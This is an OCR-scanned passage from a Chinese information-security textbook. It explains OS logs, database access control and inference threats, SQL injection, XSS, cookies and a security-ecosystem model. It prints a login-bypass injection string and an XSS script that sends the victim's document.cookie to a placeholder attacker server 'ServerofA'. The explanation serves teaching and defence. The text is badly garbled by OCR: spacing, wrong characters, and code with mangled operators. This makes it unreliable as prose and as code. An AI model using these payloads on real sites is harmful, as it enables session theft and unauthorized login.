在 那个 时 刻 ,一 个 用 户 名 为 alice 的 用 户 通过 执行 su 命令 建立 了 一 个 会 话 , 该 会 话 是 以 
root 用 户 的 名 义 建立 的 ,在 该 会 话 中 ,用 户 拥有 root 的 权限 。 该 日 志 信息 还 标 出 了 当时 
执行 su 命令 的 进程 的 进程 号 为 1149 ,非常 具体 。 

操作 系统 产生 的 日 志 非 常 多 ,为 方便 管理 和 使 用 , 它 对 这 些 日 志 信息 进行 了 分 级 , 根 
据 日 志 所 反映 的 事件 对 系统 可 能 产生 影响 的 严重 程度 ,定义 了 多 个 日 志 级 别 ,例如 ， 
Emerg 为 最 高 级 别 , Warning 为 中 等 级 别 ,Debug 为 最 低级 别 。 

操作 系统 的 日 志 机 制 为 日 志 的 生成 ,保存 和 利用 提供 了 多 种 灵活 的 功能 。 日 志 能 够 
刻画 攻击 者 对 系统 进行 攻击 时 留 下 的 痕迹 ,可 用 于 还 原 攻 击 场景 ,因此 ,也 是 攻击 者 的 攻 
击 目标 ,保护 日 志 也 是 一 项 非常 重要 的 事 关 系统 安全 的 工作 。 


4.3.3 ”数据 库 系统 安全 


数据 库 系 统 是 提供 通用 数据 管理 功能 的 软件 系统 , 它 由 数据 库 管 理 系统 (Database 
Management System,DBMS) 和 数据 库 应 用 构成 。 相 对 于 操作 系统 而 言 ,数据库 系统 属 
于 应 用 软件 系统 ,但 由 于 它 为 很 多 应 用 系统 提供 基础 数据 管理 支持 ,所 以 它 属 于 基础 软件 
系统 。 

数据 库 类 型 很 多 ,关系 数据 库 是 最 常见 .应 用 最 广泛 的 一 种 。 一 个 关系 数据 库 形式 上 
就 是 一 张 二 维 表 , 表 4-1 是 一 个 示例 。 


表 4-1 学 生 登 记 表 
学 号 姓 名 性 别 年 龄 籍 贯 系 别 年 级 
20206021 赵 山 男 18 云南 网 络 安全 2020 
20207002 钱 河 女 16 青海 计算 机 2020 
20208005 孙 湖 女 17 新 疆 数学 2020 
20209038 李 海 男 19 福建 心理 学 2020 


表 中 的 每 一 行 称 为 一 条 记录 , 表 中 的 每 一 列 对 应 记录 的 一 个 字段 。 在 表 4-1 给 出 的 
数据 库 中 , 共 定 义 了 7 个 字段 ,字段 名 分 别 是 学 号 ` 姓 名 、 性 别 、 年 龄 .籍贯 . 系 别 和 年 级 。 
这 是 一 张 学 生 登记 表 , 示 例 中 显示 了 4 条 记录 。 

关系 数据 库 的 访问 和 应 用 开发 通常 采用 结构 化 查询 语言 (SQL) ,这 是 由 美国 国家 标 
准 协会 (ANSID 和 国际 标准 化 组 织 (ISO) 推 荐 的 标准 化 语言 。 这 是 一 种 描述 性 语言 ,不 是 
过 程 化 语言 ,使 用 时 不 需要 编写 详细 实现 过 程 ,只 需要 给 出 声明 。 例 如 : 


SELECT *FROM 学 生 登 记 表 WHERE 年 龄 <= 17 


这 条 语句 查看 “学 生 登 记 表 ”中 所 有 "年龄 ”小 于 或 等 于 17 岁 的 学 生 的 名 单 。 它 只 描述 了 
要 做 什么 ,没有 给 出 怎么 做 的 过 程 ,这 就 是 描述 性 语言 的 特点 。 
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数据 库 表 的 基本 操作 是 查询 (SELECT) ,修改 (UPDATE)、 插 入 (INSERT)、 删 除 
(DELETE) ,关系 数据 库 自 主 访问 控制 的 基本 任务 就 是 对 这 些 操作 进行 授权 。 授 权 用 
GRANT 语句 ,例如 ,以 下 语句 授权 用 户 “ 丁 松 ” 对 “学 生 登 记 表 ”执行 查询 操作 : 


GRANT SELECT ON 学 生 登 记 表 TO 丁 松 


可 以 给 用 户 授予 访问 数据 库 表 的 权限 ,也 可 以 撤销 用 户 拥有 的 访问 数据 库 表 的 权限 。 撤 
销 权 限 用 REVOKE 语句 ,例如 ,以 下 语句 撤销 用 户 “ 胡 影 * 所 拥有 的 修改 “学 生 登 记 表 ” 的 
权限 : 


REVOKE UPDATE ON 学 生 登 记 表 FROM 胡 影 


关系 数据 库 系 统 的 自主 访问 控制 既 支 持 基 于 名 称 的 访问 控制 ,也 支持 基于 内 容 的 访 
问 控制 。 在 基于 名 称 的 访问 控制 中 ,通过 指明 客体 的 名 称 来 实施 对 客体 的 保护 。 在 基于 
内 容 的 访问 控制 中 ,系统 可 以 根据 数据 项 的 内 容 决定 是 否 允 许 对 数据 项 进行 访问 。 在 上 
面 给 出 的 例子 中 ,学 生 登 记 表 ?是 数据 库 表 的 名 称 ,那样 的 授权 方式 对 应 的 是 基于 名 称 的 
访问 控制 。 

基于 内 容 的 访问 控制 要 求 根 据 数据 的 内 容 进 行 访问 控制 判定 。 关 系数 据 库 管理 系统 
中 的 视图 (View) 机 制 可 用 于 提供 基于 内 容 的 访问 控制 支持 。 视 图 是 可 以 展示 数据 库 表 
中 的 字段 和 记录 的 子 集 的 动态 窗口 , 它 通 过 查询 操作 来 确定 所 要 展示 的 字段 和 记录 的 子 
集 。 例 如 ,以 下 语句 创建 “学 生 登 记 表 ” 的 一 个 视图 : 

CREATE VIEW 部 分 男生 

AS SELECT 学 号 , 姓名 , 籍贯， 系 别 
FROM 学 生 登 记 表 
WHERE 性 别 =' 男 ' AND 年 龄 >= 18 

上 述 语句 创建 的 名 为 "部 分 男生 ”的 视图 只 显示 * 学 生 登 记 表 ”中 年 龄 在 18 岁 及 以 上 的 男 
生 的 名 单 ,而 且 只 显示 学 号 、 姓 名、 籍贯 和 系 别 4 个 字段 的 数据 。 显 然 , 无 论 字 段 还 是 记 
录 ,“ 部 分 男生 ”中 的 数据 都 只 是 “学 生 登 记 表 ”的 一 个 子 集 。 以 下 语句 授权 用 户 “ 水 竟 ” 查 
看 这 句 数据 子 集 : 


GRANT SELECT ON 部 分 男生 To 水 前 


这 就 是 基于 内 容 的 访问 控制 , 它 能 控制 只 允许 用 户 “ 水 韵 " 查 看 “学 生 登 记 表 ” 中 部 分 指定 
的 内 容 。 用 户 “水 前” 执行 以 下 语句 可 以 查看 这 些 内 容 : 


SELECT *FROM 部 分 男生 


自主 访问 控制 对 于 保护 数据 库 数据 具有 广泛 的 意义 ,但 是 , 它 存 在 一 定 的 不 足 。 例 

如 ,一 旦 用 户 获得 了 访问 授权 ,得 到 了 数据 库 数据 ,自主 访问 控制 就 无 法 对 这 些 数 据 的 传 

播 和 使 用 施加 任何 控制 。 针 对 数据 库 系 统 自主 访问 控制 存在 的 不 足 , 强 制 访问 控制 和 多 
级 安全 数据 库 系统 有 助 于 解决 相应 的 问题 。 

强制 访问 控制 和 多 级 安全 数据 库 系统 以 数据 的 级 别 划 分 为 基础 对 数据 库 数据 进行 访 

问 控制 。 它 们 根据 数据 的 敏感 程度 确定 数据 的 敏感 级 别 ,敏感 级 别 越 高 ,表示 数据 的 敏感 
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程度 越 高 。 同 时 ,根据 用 户 在 工作 中 应 该 涉及 的 数据 的 敏感 程度 ,为 用 户 分 配 敏 感 等 级 ， 
敏感 等 级 越 高 ,表示 用 户 可 以 访问 的 数据 的 敏感 级 别 越 高 。 每 当 用 户 要 对 数据 进行 访问 
时 ,系统 的 安全 机 制 根据 用 户 的 敏感 等 级 和 数据 的 安全 级 别 确定 访问 是 否 允 许 进行 。 

理论 上 说 ,可 以 基于 表 、 字 段 或 记录 建立 敏感 级 别 。 在 实际 应 用 中 ,切实 可 行 的 有 效 
方法 是 基于 记录 的 敏感 级 别 进 行 访问 控制 。 在 记录 级 的 多 级 安全 关系 数据 库 系 统 中 ,可 
以 给 一 张 表 中 的 不 同 记录 分 配 不 同 的 敏感 级 别 。 本 质 上 ,敏感 级 别 把 一 张 表 分 割 成 了 多 
张 相互 隔离 的 子 表 , 不 同 子 表 中 的 记录 具有 不 同 的 敏感 级 别 。 拥 有 不 同 敏感 等 级 的 用 户 
实际 上 可 以 访问 的 是 不 同 敏感 级 别 的 子 表 中 的 记录 数据 。 

访问 控制 机 制 可 以 防止 用 户 对 数据 库 数 据 进行 非法 直接 访问 ,但 无 法 防止 用 户 对 数 
据 库 数据 进行 非法 间接 访问 。 数 据 推理 (Inference) 可 以 根据 合法 的 非 敏感 数据 推导 出 非 
法 的 敏感 数据 ,是 数据 库 数据 面临 的 严重 的 间接 访问 威胁 。 

推理 威胁 源 自 统计 数据 库 。 统 计数 据 库 是 用 于 统计 分 析 目 的 数据 库 , 它 允许 用 户 查 
询 聚 集 类 型 的 数据 ,但 不 允许 查询 单个 记录 数据 。 例 如 ,可 以 允许 查询 员工 工资 的 平均 
值 , 但 不 允许 查询 具体 员工 的 工资 。 

求 和 值 . 记 录 数 ,平均 值 .中 位 数 等 是 数据 库 系 统 中 可 以 发 布 的 常见 合法 统计 数据 。 
有 时 ,可 以 运用 推理 方法 根据 这 些 合法 的 统计 数据 推导 出 不 合法 的 敏感 数据 。 数据 库 数 
据 的 推理 控制 就 是 要 阻止 用 户 根据 公开 发 布 的 非 敏 感 数据 推导 出 敏感 信息 。 

对 于 数据 库 系 统 安全 ,一 方面 ,要 从 DBMS 的 角度 增强 数据 库 系 统 应 该 具有 的 安全 
功能 , 另 一 方面 ,要 从 数据 库 应 用 的 角度 缓解 数据 库 系 统 无 法 回避 的 安全 风险 。SQL 注 
和 人 是 数据 库 应 用 中 经 常 遇 到 的 一 种 典型 安全 威胁 。 

很 多 应 用 系统 利用 数据 库 系统 来 存储 和 管理 用 户 的 账户 数据 。 这 些 账 户 数据 中 包含 
用 户 名 和 口令 等 数据 ,用 于 用 户 登录 时 进行 身份 认证 。 通 常 , 这 些 应 用 系统 的 登录 界面 会 
提供 两 个 输入 框 , 让 用 户 分 别 在 里 面 输入 用 户 名 和 口令 ,与 这 些 对 话 框 对 应 的 数据 库 访问 
语句 如 下 所 示 : 


SELECT UserList.Username 
FROM UserList 
WHERE UserList.Username = 'Username' 


AND UserList.Password -'Password' 
其 中 ,UserList 是 账户 数据 库 表 的 名 称 ,Username 和 Password 分 别 是 表 中 对 应 到 用 户 
名 和 口令 的 字段 名 称 ,等 号 右边 单 引号 中 的 Username 和 Password 分 别 对 应 用 户 在 输入 
框 中 输入 的 用 户 名 和 口令 。 如 果 用 户 输 入 了 正确 的 用 户 名 和 口令 值 ,该 语句 能 在 数据 库 
中 找到 至 少 一 条 记录 ,认证 通过 。 
如 果 攻 击 者 知道 用 户 名 但 不 知道 口令 ,他 在 用 户 名 输入 框 输入 了 正确 的 用 户 名 后 ,可 
以 在 口令 输入 框 输入 以 下 信息 : 


password' OR '1'-'1 
接收 到 这 个 输入 后 ,上 述 数 据 库 访问 语句 将 被 解释 为 以 下 形式 : 


SELECT UserList.Username 
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FROM UserList 
WHERE UserList.Username -'Username' 


AND UserList.Password -'password' OR '1'-'1' 


由 于 用 户 输入 的 用 户 名 是 正确 的 ,而 且 '4 一 '1' 恒 真 , 所 以 ,该 语句 也 能 在 数据 库 中 找到 至 
少 一 条 记录 ,认证 也 能 通过 。 

就 算 攻 击 者 不 知道 用 户 名 ,他 也 可 以 采取 类 似 方法 ,在 用 户 名 输入 框 中 输入 具有 恒 真 
条 件 的 输入 ,同样 能 达到 目的 。 

SQL 注入 攻击 绝 不 是 仅仅 骗取 登录 通过 那么 简单 。 通 过 在 输入 框 中 构造 巧妙 的 输 
入 ,可 以 任意 获取 数据 库 中 的 数据 ,或 者 删除 数据 库 中 的 数据 。 应 对 SQL 注入 攻击 的 办 
法 是 在 应 用 系统 的 代码 中 添加 对 用 户 的 输入 进行 严格 检查 的 功能 ,禁止 在 输入 中 滥用 转 
XT. 


4.3.4 应 用 系统 安全 


自从 有 了 网 络 空间 中 的 各 种 应 用 ,人 类 的 生活 便 变 得 更 加 绚丽 多 彩 。 床 头 路 边 的 即 
时 聊天 ,都 市 乡间 的 抬 手 自拍 ,菜市 场 里 的 扫 码 付款 ,停车 场 上 的 杆 起 杆 落 ,不 管 人 们 有 没 
有 留意 ,都 有 应 用 系统 在 提供 服务 。 基 于 Web 的 应 用 (简称 Web 应 用 ) 是 典型 的 常见 应 
用 之 一 ,本 小 节 以 该 类 应 用 为 例 ,考察 应 用 系统 的 安全 现象 。 

Web 应 用 的 一 大 特点 是 借助 浏览 器 的 形式 ,打破 了 异 构 设 备 之 间 的 差异 屏障 ,使 得 
多 种 多 样 的 设备 都 可 以 用 来 连接 同一 个 应 用 系统 ,扩大 了 应 用 系统 的 适应 性 ,提升 了 用 户 
选择 的 灵活 性 。 浏 览 器 是 Web 应 用 系统 的 前 端 ,是 用 户 进入 应 用 系统 的 接口 ,用户 只 需 
要 使 用 浏览 器 就 可 以 使 用 Web 应 用 系统 提供 的 功能 。 

用 户 通过 浏览 器 访问 Web 应 用 系统 ,但 是 ,Web 应 用 系统 的 主要 功能 并 不 是 浏览 器 
提供 的 ,而 是 藏 在 幕后 的 服务 器 提供 。 通 常 , 用 户 无 法 知道 服务 器 在 哪里 ,不 过 不 要 紧 , 只 
要 知道 服务 器 的 网 址 (术语 是 URL) 就 可 以 了 。 服 务 器 那 一 端 称 为 服务 端 ,用 户 这 一 端 称 
为 客户 端 。 客 户 端的 浏览 器 使 用 一 种 称 为 HTML 的 语言 按照 HTTP 与 服务 端的 服务 器 
进行 交互 ,把 服务 端 提供 的 Web 应 用 功能 展现 在 用 户 面前 。 

Web 应 用 展现 在 用 户 面 前 的 是 各 种 网 页 。 过 去 的 网 页 大 多 是 静态 的 ,现在 的 网 页 幅 
人 了 很 多 动态 的 元 素 ,增强 了 用 户 体 验 的 喜悦 感 ,提升 了 Web 应 用 与 用 户 互动 的 能 力 。 
Web 应 用 与 用 户 交互 的 功能 通过 在 HTML 中 嵌入 各 种 脚本 来 实现 , 称 为 JavaScript 的 
脚本 就 是 其 中 一 种 非常 常用 的 类 型 。 

常言 道 : 鱼 与 能 掌 不 可 兼 得 。 在 网 页 中 典 入 JavaScript 脚本 让 用 户 获 得 了 与 Web 应 
用 交互 的 强大 功能 ,同时 ,也 带 来 了 不 可 忽视 的 安全 隐患 。 一 种 称 为 跨 站 脚本 (Cross-site 
scripting,XSS) 攻 击 的 安全 威胁 就 是 其 中 格外 引 人 瞩 目的 一 种 , 它 在 Web 应 用 安全 中 占 
有 最 大 比重 , 远 远 超过 其 他 安全 威胁 。 

Web 应 用 与 用 户 的 交互 通过 输入 输出 功能 实现 ,用 户 通过 输入 向 应 用 系统 发 服务 请 
求 ,应 用 系统 以 输出 的 形式 给 用 户 提 供 响应 结果 。 例 如 ,用 户 在 搜索 页 面 的 输入 框 中 输入 
搜索 关键 词 ,系统 给 用 户 输出 查找 结果 页 面 。 在 XSS 攻击 中 ,攻击 者 想 办 法 把 恶意 脚本 
藏 在 Web 应 用 的 输入 和 输出 之 中 ,实现 攻击 目的 。 
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假设 用 户 A 和 B 都 使 用 浏览 器 访问 网 站 W 提供 的 Web 应 用 系统 ,XSS 攻击 的 意思 
是 : A 想 攻击 B,A 把 实现 攻击 意图 的 恶意 脚本 藏 在 发 给 W 应 用 系统 的 输入 中 ,使 W 在 
不 知 不 觉 中 把 恶意 脚本 输出 给 B,B 的 浏览 器 执行 该 恶意 脚本 ,无 意 中 帮 助 A 实现 了 攻击 
B 的 目的 。A 攻击 B 的 目的 之 一 可 能 是 窃取 B 的 敏感 信息 ,比如 ,银行 账号 和 密码 。 在 
这 场 游 戏 中 ,A 是 攻击 者 ,B 是 受害 者 ,W 是 不 知情 的 帮凶 ,B 的 浏览 器 也 脱 不 了 干系 , 虽 
然 它 也 被 蒙 在 鼓 里 。 

不 妨 设 W 提供 的 是 某 个 论坛 应 用 ,用户 可 以 在 输入 框 中 输入 评论 ,评论 将 被 存储 在 
W 的 后 端 数据 库 中 ,用 户 查 看 评论 时 , W 应 用 从 数据 库 中 找到 评论 并 把 它 输出 给 用 户 。 
j 户 A 可 以 在 评论 框 中 输入 以 下 信息 : 


新 冠 疫 情 在 全 球 蔓延 


W 将 把 该 信息 原原本本 地 保存 在 数据 库 中 。 如 果 用 户 B 查看 相应 评论 ,W 就 把 该 信息 传 
到 B 的 客户 端 ,由 B 的 浏览 器 把 它 显示 出 来 ,B 便 看 到 “新 冠 疫情 在 全 球 萤 延 "这 样 的 评论 
信息 。 

不 过 ,网 页 除了 允许 在 输入 框 中 输入 文本 信息 外 ,也 允许 输入 脚本 代码 。 例 如 ,用 户 
A 可 以 在 W 的 评论 输入 框 中 输入 以 下 信息 : 


新 冠 病毒 <script>alert(' 阿 门 ') </script> 


W 照样 把 该 信息 原原本本 地 保存 到 数据 库 中 。 这 次 , 当 用 户 B 查看 相应 的 评论 时 ,你 猜 
他 看 到 的 将 是 什么 呢 ? 他 将 看 到 * 新 冠 病毒 " 几 个 字 , 同 时 ,可 能 还 看 到 一 个 弹出 框 ,其 中 
显示 "阿门" 字样。 你 猜 对 了 吗 ? 总 之 ,B 看 到 的 信息 与 A 输入 的 信息 有 所 不 同 。 

实际 上 ,B 的 浏览 器 接收 到 的 信息 与 A 输入 的 信息 是 一 模 一 样 的 ,只 不 过 ,浏览 器 把 
介 于 二 script> 和 三 /seript 一 之 间 的 内 容 解 释 为 脚本 代码 并 执行 该 代码 ,在 上 例 中 ,执行 
的 是 alert 函数 ,该 函数 把 “阿门 "显示 出 来 。 

上 面 的 例子 是 为 了 介绍 基本 原理 而 设计 的 ,其 中 的 脚本 很 简单 ,也 没有 什么 恶意 。 这 
并 不 意味 着 浏览 器 只 会 执行 简单 有 趣 的 脚本 。 接 收 到 什么 脚本 ,浏览 器 就 执行 什么 脚本 。 
攻击 者 可 以 设计 具有 各 种 功能 的 恶意 脚本 。 以 下 是 一 个 稍微 复杂 一 点 的 脚本 示例 : 


<script> 
window.location-'http://ServerofA/? cookie- '*document.cookie 


«/script» 


其 中 的 ServerofA 表示 用 户 A 的 服务 器 的 域名 地 址 ,document.cookie 是 JavaScript 提供 
的 一 个 功能 调用 接口 , 它 的 功能 是 获取 本 机 的 cookie 信息 。 后 面 再 介绍 cookie 信息 , 现 
在 先 暂时 不 管 。 这 段 脚本 的 意图 是 向 用 户 A 事先 准备 好 的 一 台 服 务 器 发 送 一 个 HTTP 
请 求 , 并 把 从 本 机 获取 到 的 cookie 信息 作为 该 请 求 的 参数 传 给 该 服务 器 ,该 服务 器 响应 
该 请 求 时 便 得 到 了 传 来 的 cookie 信息 。 

假如 用 户 B 查阅 W 应 用 中 由 A 发 布 的 评论 , 则 B 的 浏览 器 便 执行 上 述 脚本 ,该 脚本 
将 获取 保存 在 用 户 B 的 机 器 中 的 cookie 信息 ,并 把 这 些 信息 发 送 给 用 户 A 的 服务 器 。 由 
于 用 户 B 的 机 器 上 的 cookie 信息 含有 B 的 敏感 信息 ,这 样 , 用 户 A 便 窃取 到 了 用 户 B 的 
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敏感 信息 。 至 此 ,A 发 动 的 XSS 攻击 成 功 。 

这 是 一 个 Web 应 用 的 安全 问题 ,是 由 应 用 的 输入 输出 引起 的 安全 问题 。 案 例 中 的 应 
用 是 W 应 用 。 从 用 户 A 的 角度 看 ,由 于 A 通过 A 机 器 上 的 浏览 器 访问 W 应 用 ,所 以 ,A 
的 浏览 器 是 W 应 用 的 一 个 组 成 部 分 。 同 理 .从 用 户 B 的 角度 看 ,B 的 浏览 器 也 是 W 应 用 

一 个 组 成 部 分 。 从 总 体 角 度 看 , W 服务 端的 应 用 和 所 有 用 户 端的 浏览 器 共同 构成 了 W 
应 用 。 

显然 ,案例 中 ,窃取 用 户 B 的 敏感 信息 这 个 任务 最 终 是 由 B 自己 的 浏览 器 直接 实施 
的 。 但 归根 到 底 , 问 题 出 在 W 服务 端的 应 用 存在 安全 漏洞 , 它 没有 对 用 户 的 输入 进行 严 
格 检查 并 滤 掉 恶意 脚本 ,反而 把 恶意 脚本 传 给 了 用 户 B. 

在 用 户 A 发 动 的 XSS 攻击 安全 事件 中 ,用 户 B 受 到 了 损失 ,网 站 W 也 受到 了 损失 ， 

至 少 有 名 誉 损失 ,因为 用 户 B 毕竟 是 因为 访问 了 网 站 W 的 应 用 而 出 的 问题 。 其 实 , 用 户 
A 设计 的 恶意 脚本 确实 可 以 专门 针对 网 站 W ,而 不 是 针对 其 他 用 户 。 例 如 ,恶意 脚本 可 
以 不 窃取 用 户 敏感 信息 ,而 是 以 网 站 W 的 名 义 发 布 不 良 信息 。 

以 上 案例 涉及 的 是 XSS 攻击 的 一 种 类 型 ,XSS 攻击 还 有 其 他 类 型 ,不 过 ,本 小 节 的 主 
任务 不 是 XSS 攻击 ,而 是 Web 应 用 安全 。 下 面 考察 一 下 案例 中 提 到 的 cookie 是 如 何 汇 
圳 用户 敏感 信息 的 。 

当 一 个 用 户 的 浏览 器 与 一 个 网 站 的 服务 器 进行 交互 时 ,浏览 器 向 服务 器 发 请 求 信息 ， 
服务 器 向 浏览 器 发 响应 信息 。 有 时 ,服务 器 在 响应 信息 的 头 部 嵌入 一 些 类 似 于 简单 的 变 
量 赋值 语句 一 样 的 信息 ,并 给 这 些 信 息 标 上 Set-Cookie 标记 ,浏览 器 接收 到 这 些 信 息 时 ， 
将 把 它们 保存 在 用 户 端 机 器 上 。 当 该 浏览 器 再 次 向 该 服务 器 发 请 求 信息 时 ,将 在 请 求 信 
息 的 头 部 嵌入 这 些 信 息 ,并 给 它们 标 上 Cookie 标记 ,以 表明 服务 器 曾经 设置 过 这 些 值 。 
通过 这 种 方式 由 服务 器 建立 、 由 浏览 器 保存 并 返还 给 服务 器 的 信息 称 为 cookie. 

例如 ,浏览 器 第 一 次 向 服务 器 请 求 如 下 : 


GET /index.html HTTP/1.1 


Host: www.example.org 
服务 器 响应 如 下 : 


HTTP/1.0 200 OK 
Content-type: text/html 


Set-Cookie: theme-light 
Set-Cookie: sessionToken-abc123; Expires-Wed, 09 Jun 2021 10:18:14 GMT 


浏览 器 再 次 请 求 如 下 : 


GET /spec.html HTTP/1.1 
Host: www.example.org 


Cookie: theme-light; sessionToken-abcl23 


其 中 ,给 theme 和 session Token 赋值 的 信息 就 是 cookie。 
Cookie 的 用 途 是 让 网 站 服务 器 记 住 浏览 器 以 往 浏览 该 网 站 时 的 一 些 行为 ,例如 ,用 
户 是 否 已 登录 .访问 过 哪些 网 页 点 击 过 哪些 按钮 ,等 等 。 建 立 cookie 的 原始 出 发 点 是 提 
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升 用 户 浏览 网 站 的 体验 。 实 际 上 ,服务 器 想 记 住 的 各 种 信息 都 有 可 能 用 cookie 保存 下 
来 ,包括 用 户 在 输入 框 中 输入 过 的 用 户 名 口令、 信用卡 号码 等 。 SEA. cookie 中 会 有 用 户 
的 敏感 信息 ,所 以 ,cookie 的 泄露 会 导致 用 户 敏感 信息 泄露 。cookie 的 种 类 很 多 ,此 处 不 
作 详 述 。 


4.3.5 安全 生态 系统 


图 灵 奖 和 诺 贝 尔 经 济 学 奖 获得 者 赫 伯 特 ， 西 蒙 (Herbert A. Simon) 曾 经 说 过 , 人工 
科学 可 以 从 自然 科学 中 得 到 启发 。 观 察 网 络 空 间 这 个 人 工 疆域 的 系统 安全 ,系统 概念 和 
安全 概念 本 身 都 有 明显 的 自然 疆域 的 痕迹 。 网 络 空间 的 生态 效应 日 趋 明显 ,从 自然 生态 
系统 中 捕获 灵感 ,有 助 于 指引 系统 安全 走出 困境 。 

自然 界 的 生态 系统 (Ecosystem) 指 的 是 在 一 定 区 域 中 共同 栖 居 着 的 所 有 生物 ( 即 生 
物 群 落 ) 与 其 环境 之 间 由 于 不 断 进 行 物质 循环 和 能 量 流动 过 程 而 形成 的 统一 整体 。 

首先 ,这 个 概念 强调 整体 的 思想 ,一 个 生态 系统 是 一 个 统一 整体 , 那 是 生物 体 与 环境 
的 统一 ,也 是 人 与 自然 的 统一 。 其 次 ,生态 系统 是 实在 的 ,不 是 虚无 的 ,一 个 地 理 范 围 能 确 
定 它 的 边界 ,谈论 一 个 生态 系统 需要 明确 一 个 区 域 。 再 者 ,生态 系统 各 组 成 部 分 之 间 的 相 
互 作用 存在 清晰 的 线索 , 那 就 是 物质 的 循环 和 能 量 的 流动 。 

生态 系统 的 组 成 部 分 包括 无 机 物 , 有 机 物 、 环 境 、. 生 产 者 吞噬 生物 和 腐生 生物 。 无 机 
物 包括 碳 ` 氮 二氧化碳 和 水 等 。 有 机 物 包 括 蛋白 质 、 糖 类 .脂肪 和 腐殖质 等 。 环 境 由 空 
气 \ 水 和 基质 环境 构成 。 生 产 者 主要 是 绿色 植物 。 吞 噬 生 物 主 要 是 细菌 和 真菌 ,它们 把 死 
亡 有 机 物 分 解 为 无 机 养分 。 

生态 系统 是 鲜 活 的 控制 论 系统 ,反馈 控制 作用 使 生态 系统 得 以 保持 动态 平衡 。 生 态 
系统 组 成 部 分 之 间 的 物质 循环 和 能 量 流动 本 质 上 也 是 物理 和 化 学 信息 的 传递 ,这 样 的 信 
息 传递 把 各 组 成 部 分 关联 起 来 ,形成 网 状 关系 ,构成 信息 网 络 。 正 是 因为 有 物理 和 化 学 信 
息 在 信息 网 络 中 发 挥 调 节 作 用 , 才 使 各 组 成 部 分 能 形成 一 个 统一 整体 。 

复杂 系统 研究 表明 .了解 生 态 系统 对 于 认识 和 应 对 复杂 系统 环境 中 出 现 的 问题 具有 
重要 的 现实 意义 。 网 络 空间 是 一 种 复杂 的 人 工 环境 ,网 络 空间 中 的 系统 无 疑 属于 复杂 系 
统 。 在 观察 网 络 空间 复杂 现象 的 过 程 中 ,生态 思想 开始 受到 重视 ,数字 生态 系统 、 网 络 空 
间 生 态 系统 等 概念 逐渐 形成 。 

一 个 数字 生态 系统 是 一 个 分 布 式 的 、 适 应 性 的 、 开 放 的 社会 -技术 系统 , 受 自然 生态 系 
统 启发 , 它 具 有 自 组 织 性 、 可 伸缩 性 和 可 持续 性 。 数 字 生 态 系统 模型 受到 了 自然 生态 系统 
知识 的 启示 ,尤其 是 在 形形色色 的 实体 之 间 的 竞争 与 合作 的 相关 方面 。 

像 自然 生态 系统 一 样 , 网 络 空间 生态 系统 由 形形色色 的 .出 于 多 种 目的 进行 交互 的 各 
种 成 员 构 成 ,主要 成 员 包 括 私 营 企业 , 非 营 利 组 织 ,政府 .个 人 .过程 和 网 络 空间 设备 等 , 主 
要 设备 包括 计算 机 、 软 件 和 通信 技术 等 。 

国际 互联 网 协会 (Internet Society) 给 出 了 互联 网 生态 系统 的 模型 。 该 模型 把 互联 网 
生态 系统 的 组 成 部 分 划分 为 6 类 ,分 别 是 : 

CD 域名 和 地 址 分 配 。 

@ 开放 标准 开发 。 
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@ 全 球 共享 服务 和 运营 。 

Q RP. 

C 教育 与 能 力 建设 。 

@ 地 方 . 地 区 、 国 家 和 全 球 政策 制定 。 

其 中 ,第 1 和 2 类 主要 是 一 些 组 织 机 构 ; 第 3 类 包含 组 织 机 构 和 机 器 系统 ,如 根 服务 系统 ; 
第 4 类 既 有 组 织 机 构 , 也 有 个 人 ,还 有 机 器 或 设备 ;第 5 类 和 第 6 类 包含 组 织 机 构 和 个 人 。 
这 里 所 说 的 组 织 机 构 可 能 是 企业 ,政府 大 学 或 非 营利 组 织 等 。 总 之 ,该 模型 描述 的 互联 
网 生态 系统 由 人 、 机 构 和 机 器 设备 等 构成 ,与 上 述 网 络 空间 生态 系统 概念 基本 一 致 。 

自然 界 生 态 系统 的 思想 表明 ,生态 系统 的 组 成 部 分 相互 作用 形成 统一 整体 ,组 成 部 分 
间 的 反馈 控制 作用 维持 系统 的 动态 平衡 。 该 思想 在 网 络 空间 同样 适用 , 它 喻 示 着 考虑 系 
统 安全 问题 要 注意 相互 作用 和 反馈 控制 。 

生态 系统 视角 下 的 安全 威胁 模型 与 传统 安全 威胁 模型 很 不 相同 。 以 企业 安全 为 例 ， 
在 传统 视角 下 ,主要 考虑 来 自 外 部 的 威胁 对 企业 安全 的 影响 ,一 般 认为 ,只 要 企业 自身 的 
安全 措施 落实 到 位 ,企业 的 安全 目标 就 能 实现 。 但 在 生态 系统 视角 下 ,不 但 要 考虑 企业 自 
身 的 安全 因素 ,还 必须 考虑 合作 伙伴 的 安全 因素 。 就 算 企 业 自 身 的 安全 措施 非常 完善 , 合 
作 伙 伴 出 现 安全 事件 也 会 使 企业 受到 波及 。 硬 件 木马 的 分 析 已 经 反映 出 这 类 问题 。 

与 企业 独自 开展 安全 防御 的 方式 相 比 , 合 作 伙伴 间 的 安全 协作 显得 更 加 复杂 。 仅 考 
虚 非 技术 因素 ,正如 数字 生态 系统 定义 中 指出 的 那样 ,合作 伙伴 之 间 可 能 既 存 在 合作 关系 
了 电 存 在 竞争 关系 ,合作 与 竞争 之 间 的 权衡 会 影响 各 自在 安全 协作 中 的 表现 。 把 技术 因素 
再 纳入 进来 ,问题 将 更 加 棘手 。 

在 网 络 空间 中 从 生态 系统 的 角度 应 对 系统 安全 问题 ,一 方面 要 把 系统 的 概念 从 传统 
的 意义 上 拓展 到 生态 系统 的 范围 ,重新 认识 安全 威胁 ,构建 相应 的 安全 模型 ; 另 一 方面 要 
有 新 的 支撑 技术 ,在 自动 化 ` 互 操作 性 和 身份 认证 等 重要 关键 技术 方面 有 新 的 突破 。 

自动 化 技术 方面 的 努力 是 要 用 机 器 代替 人 工 感知 安全 态势 并 采取 应 对 措施 ,使 安全 
响应 速度 跟 上 攻击 速度 ,改变 传统 以 人 力 响应 速度 应 对 机 器 攻击 速度 的 格局 。 互 操作 性 
技术 解决 合作 伙伴 之 间 人 员 可 理解 层面 的 沟通 问题 ,并 自动 转化 为 机 器 可 理解 层面 的 协 
同 联动 问题 。 身 份 认证 技术 要 由 传统 的 人 员 认 证 拓展 到 包含 设备 认证 ,设备 要 把 计算 机 、 
软件 和 信息 等 考虑 在 内 ,为 在 线 安 全 决策 建立 基础 。 


本 章 小 结 


网 络 空间 的 系统 安全 起 源 于 运行 在 大 型 主机 系统 上 的 安全 操作 系统 。 探 访 历 史上 曾 
经 在 实际 应 用 中 发 挥 过 作用 的 典型 安全 操作 系统 ,可 以 快速 形成 系统 安全 的 感性 认识 。 
